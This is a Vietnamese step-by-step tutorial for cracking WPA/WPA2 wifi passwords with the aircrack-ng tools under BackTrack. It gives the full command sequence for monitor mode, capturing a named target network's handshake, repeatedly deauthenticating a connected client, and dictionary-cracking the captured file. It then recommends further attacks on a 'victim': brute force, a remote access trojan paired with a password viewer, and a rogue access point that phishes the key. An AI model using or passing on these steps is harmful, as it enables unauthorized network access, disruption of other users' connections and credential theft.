Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA-WPA2

6
Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA/WPA2 Tóm tắt các lệnh 1: airodump-ng // để kiểm tra interface của card wireless 2: airmon-ng start wlan0 // khởi động card wireless 3: airodump-ng start mon0 // chuyển sang chế độ nghe ngóng-giám sát. 4: airodump-ng -c 1 bssid xx:xx:xx:xx:xx:xx -w capture mon0 //bắt gói tin AP xx.. là mac AP cần tấn công. 5: aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy mon0 / làm client rớt mạng nhanh chóng để lấy được gói tin chứa thông tin xác thực. yy… là MAC của client đang kết nối đến AP. 6: aircrack-ng -c /root/capture-01.cap -w /mnt/IT/wordlist/keys.txt // so sánh thông tin mã hóa pass với bộ từ điển để lấy tìm pass, /root/capture-01.cap là file chứa gói xác thực bắt được, /mnt/IT/wordlist/keys.txt là đường dẫn chỉ đến nơi chứa file dictionary. 1.Bộ từ điển đủ mạnh, hoặc dùng của Back track cũng được. Từ điển thì các bạn có thể tải trên mạng rất nhiều, nếu có thời gian thì mình sẽ hướng dẫn làm từ điển riêng cho mình và cái không thể thiếu là hệ điều hành Back Track . 2. 1 cái USB (>=4G)để bung hệ điều hành Back track boot trên USB thay vì dùng máy ảo, hoặc bạn burn OS ra đĩa DVD cũng được. 3. Nếu dùng USB thì phải cần đến phần mền này unetbootin-windows-575 mục đích là tạo file boot USB cho OS Linux, nếu không có nó sẽ không boot được bằng USB.

Transcript of Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA-WPA2

Page 1: Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA-WPA2

Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA/WPA2

Tóm tắt các lệnh

1: airodump-ng // để kiểm tra interface của card wireless

2: airmon-ng start wlan0 // khởi động card wireless

3: airodump-ng start mon0 // chuyển sang chế độ nghe ngóng-giám sát.

4: airodump-ng -c 1 –bssid xx:xx:xx:xx:xx:xx -w capture mon0 //bắt gói tin AP xx.. là

mac AP cần tấn công.

5: aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy mon0 / làm client rớt mạng

nhanh chóng để lấy được gói tin chứa thông tin xác thực. yy… là MAC của client đang

kết nối đến AP.

6: aircrack-ng -c /root/capture-01.cap -w /mnt/IT/wordlist/keys.txt // so sánh thông tin mã

hóa pass với bộ từ điển để lấy tìm pass, /root/capture-01.cap là file chứa gói xác thực bắt

được, /mnt/IT/wordlist/keys.txt là đường dẫn chỉ đến nơi chứa file dictionary.

1.Bộ từ điển đủ mạnh, hoặc dùng của Back track cũng được. Từ điển thì các bạn có thể

tải trên mạng rất nhiều, nếu có thời gian thì mình sẽ hướng dẫn làm từ điển riêng cho

mình và cái không thể thiếu là hệ điều hành Back Track .

2. 1 cái USB (>=4G)để bung hệ điều hành Back track boot trên USB thay vì dùng máy

ảo, hoặc bạn burn OS ra đĩa DVD cũng được.

3. Nếu dùng USB thì phải cần đến phần mền này unetbootin-windows-575 mục đích là

tạo file boot USB cho OS Linux, nếu không có nó sẽ không boot được bằng USB.

Page 2: Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA-WPA2

Nếu Boot bằng HHD thì bạn chỉ cần chọn chỗ Type là hard disk,chỉ với dung lượng gần

2g thì ổ cứng của bạn có thể chạy hàng chục HDH này trên một ổ cứng là bình thường.

xong khởi động lại sẽ có menu cho bạn chọn là khởi động vào windown bình thường hay

vào Backtrack

4. Khởi động lại máy boot vào USB

4.Chọn chế độ graphic để dễ khai thác (exploit). tóm tắt các lệnh cần dùng.

1: airodump-ng –> kiểm tra interface của card xem có hỗ trợ hack không. google seach

xem các loại card hỗ trợ(support) không nhé. Để biết card wifi có hỗ trợ không bạn làm

đến bước thứ 3 tiếp theo sau đây.

2: airmon-ng start wlan0 –> khởi động card wireless

3: airodump-ng start mon0 –> chuyển sang chế độ nghe ngóng – giám sát, nếu mà hiện

như hình sau là card có hỗ trợ hack.

4. airodump-ng wlan0 –>xem các thông tin về AP để lấy thông tin khai thác(exploit) cho các

bước sau.

Page 3: Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA-WPA2

Ở đây chúng ta cần lấy là MAC của AP và Client đang kết nối với nó. AP Chúng ta cần

tấn công là “NguyenTrongTien” dạng mã hóa là WPA2 CCMP/AES là một cơ chế mã

hóa rất mạnh và phức tạp.

4. Mở thêm một shell nữa gõ lệnh : airodump-ng -c 9 –bssid 00:27:19:D5:6D:c4 -w wpa

mon0 –> thực hiện bắt gói tin của AP với kênh ở cột CH là 9 (-c 9) MAC AP

00:27:19:D5:6D:C4 và MAC Client 00:55F:BF:7F:EA . wpa là tên đặt cho gói tin bắt

được bạn muốn đặt tên thế nào cũng được. mục đích của gói tin này là chứa các thông tin

mã hóa của password lấy nó để so sánh với dictionary. sau khi enter bạn thấy như sau:

vẫn còn chữ fixed channel wlan0 (góc phải trên cùng) là chưa bắt được gói tin cần thiết

nếu bắt tay thành công 4 lần thì sẽ có chữ WPA Handshake…. để nó hiệu qua nhanh hơn

chúng ta mở shell mới gõ lệnh tiếp theo (5).

Page 4: Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA-WPA2

5. Mở thêm một shell mới rồi gõ lệnh nhấn mũ tên đi lên và enter nhiều lần để có hiểu

quả nhanh nhất : aireplay-ng -0 1 -a 00:27:19:D5:6D:c4 -c 00:22:5F:BF:7F:EA mon0 –

>

-0 bắt client xác thực lại vì khi xác thực lại ta sẽ lấy được thông tin mã hóa pass quá trình

này không phải người dùng nhập lại mật khẩu đâu mà bị rớt mạng trong giây lát và máy

sẽ tự động kết nối lại,(trong lúc này mà có client nào kết nối thì cũng thành công trong

việc bắt gói tin xác thực) như vậy ta sẽ lấy đc thông tin. chú ý làm liên tục lệnh này đề có

kết quả nhanh nhất.

1 is the number of deauths to send

Kết quả như đã nói ở bước 4 là như sau , thấy chữ WPA Handshake… nghĩa là bắt tay

thành công 4 lần( ai học mạng không dây sẽ hiểu rõ quá trình này)

Page 5: Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA-WPA2

Bước tiếp theo là so sánh thông tin bắt được với dic để tìm pass

6 aircrack-ng -w pass.txt wpa-01.cap ” pass.tx” –> đây là file dic mà bạn tải về có dạng *.txt,

wpa-01.cap là gói tin mà bạn bắt ở bước 4. tóm lại dòng lệnh này là để giải mã pass.

chú ý là phải đúng đường dẫn đến file dic nhé, để đỡ phải gõ bạn mở nơi chứa file dic rồi kéo thả

vào màn hình shell sau chữ -w như hình sau :

Hoặc có thể dùng từ điển có sẵn của Back Track với đường dẫn bên dưới gõ mấy chữ đầu rồi

nhấn tab thì bạn đỡ phải gõ cụ thể vì OS Linux hỗ trợ điều này VD: /pent –>nhấn tab thì chúng

ta không phải gõ thêm chữ est/ đằng sau,cứ tương tự như đường dẫn đến file hay thư mục

(wpa*.cap nghĩa là tất cả các file có tên wpa..cap, file này thường có dạng *-01.cap,*-02.cap)

Bây giờ thì ngồi chờ nhé, đây là kết quả.

Page 6: Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA-WPA2

Sự thành công hay thất bại phụ thuộc vào những yếu tố sau:

1. file dic của bạn đủ mạnh để có thể có được pass.

2. Máy cấu hình càng mạnh thì càng nhanh như hình trên là 352.03 k/s (chậm lắm) bèo cũng phải

trên mb/s thì mới ok.

Tóm lại :Nếu là mã hóa dạng Web thì 100% lấy được pass

1. Dictionary attack chủ yếu là hên xui.

2. Bruteforce attack cách này thì perfect ,pass cỡ nào tra cũng ra bù lại thời gian thì khỏi phải nói

.

3. RAT+Wirelesskeyview combo attack cách này thì tựa như là cài Keylogger vào máy victim,

mà con RAT này lợi hại hơn KeyLog ở chỗ là mình có thể điều khiển máy victim => lấy cắp

pass rất dễ) .

4. Rogue AP attack dễ lấy pass nhất .Nhưng cách này dòi hỏi phải có kiến thức nhiều về mạng,

vì cách thức hoạt động là tạo một AP giả mạo ,sau đó Victim kết nối vào và nó require password

again ,sau khi victim type vào thì pass sẽ chuyển về cho mình.